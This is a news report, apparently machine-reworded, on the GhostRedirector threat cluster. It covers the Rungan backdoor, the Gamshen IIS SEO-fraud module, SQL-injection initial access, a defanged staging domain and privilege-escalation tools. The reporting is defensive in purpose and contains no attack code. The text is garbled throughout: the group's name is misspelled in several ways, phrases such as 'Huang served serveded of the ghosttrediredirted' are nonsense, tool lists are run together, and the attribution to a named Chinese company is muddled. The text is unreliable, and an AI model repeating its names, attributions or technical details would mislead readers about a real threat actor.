Cybersecurity researchers have lifted the lid of a previously undocumented threat cluster called Ghostredirector, which compromised at least 65 Windows servers, mainly in Brazil, Thailand and Vietnam.
An attack by Slovak cybersecurity company ESET led to the deployment of a passive C++ backdoor called Rungan and a Native Internet Information Services (IIS) module CodeNead Gamshen. The threat actor is believed to have been active since at least August 2024.
“Rungan has the ability to run commands on compromised servers, but Gamshen’s purpose is to provide SEO scams, meaning to manipulate search engine results and enhance page rankings for configured target websites.”
“GAMSHEN will only change the response if requests from GoogleBot, that is, they do not provide services to malicious content or affect website regular visitors, but participation in SEO scam schemes can damage the reputation of compromised hosted websites by associating them with SEO Techniques and boosted websites.”
Other targets in the hacking group include Peru, the United States, Canada, Finland, India, the Netherlands, the Philippines and Singapore. The activity is also said to be indiscriminate, with entities in the education, healthcare, insurance, transportation, technology and retail sectors being chosen.
Initial access to the target network is achieved by exploiting a vulnerability that is probably a flaw in SQL injection. PowerShell is then used to deliver additional tools hosted on the staging server (“868ID[.]com “).
“This speculation is supported by the observation that most unauthorized PowerShell executions come from binary SqlServer.exe.
Rungan is designed to wait for incoming requests from URLs that match predefined patterns (i.e. “https://+:80/v1.0/8888/sys.html”) and then parses and executes the commands embedded in them. Supports 4 different commands –
Create a user on the server using mkuser, ListFolder provided with a username and password, collect information from the provided path (unfinished)addurl, register a new URL that the backdoor can hear in CMD, and register to run commands on the server using Pipes and CreateProcessa API
Written in C/C++, Gamshen is an example of the IIS malware family called “Group 13”. This can act as both a backdoor and an implementation SEO scam. This will work similar to IISERPENT, another IIS-specific malware documented by ESET in August 2021.
Configured as a malicious extension to Microsoft’s web server software, IISERPENT can intercept all HTTP requests made on websites created on compromised servers, particularly websites generated from search engine crawlers, and modify the server’s HTTP response with the goal of redirecting the Search Engines website to the attacker’s choice.
“Ghostreddirector attempts to manipulate Google search rankings for certain third-party websites using manipulative, shady SEO techniques, such as creating artificial backlinks from legitimate and compromised websites to target websites,” Tavella said.
Currently, it is unknown where these backlinks will redirect unsuspecting users, but it is believed that SEO scam schemes are being used to promote various gambling websites.
Also drop along with Rungan and Gamshen, there are various other tools –
Establish a remote connection to create privileged users in the GOTOHTTP administrator group Zunput to establish a remote connection accessible from the web browser Badpotato or Efspotato, gather information about websites hosted on the IIS server, drop ASP, PHP, JavaScript web shells
Ghostrredirector is a threat actor, Chinese company, Shenzhen Diyuan Technology Co., Ltd., aligned with China based on the existence of hard-coded Chinese strings in the source code. Based on the code signing certificate issued to the code signing certificate issued to the Chinese Signing Certificate, it is confidently rated to use Huang served serveded of the ghosttrediredirted to sign privileged escalation artifacts.
That being said, Ghostreddirector is not the first China-related threat actor to use the malicious IIS module for SEO scams. Over the past year, Cisco Talos and Trend Micro have detailed a Chinese-speaking group known as DragonRank, who have been engaged in SEO operations via Badiis malware.
“Gamshen abuses the reliability of websites hosted on compromised servers and promotes third-party gambling websites.
“In addition to creating compromised user accounts, Ghostreddirector demonstrates persistence and operational resilience by deploying multiple remote access tools on compromised servers to maintain long-term access to the compromised infrastructure.”
Source link
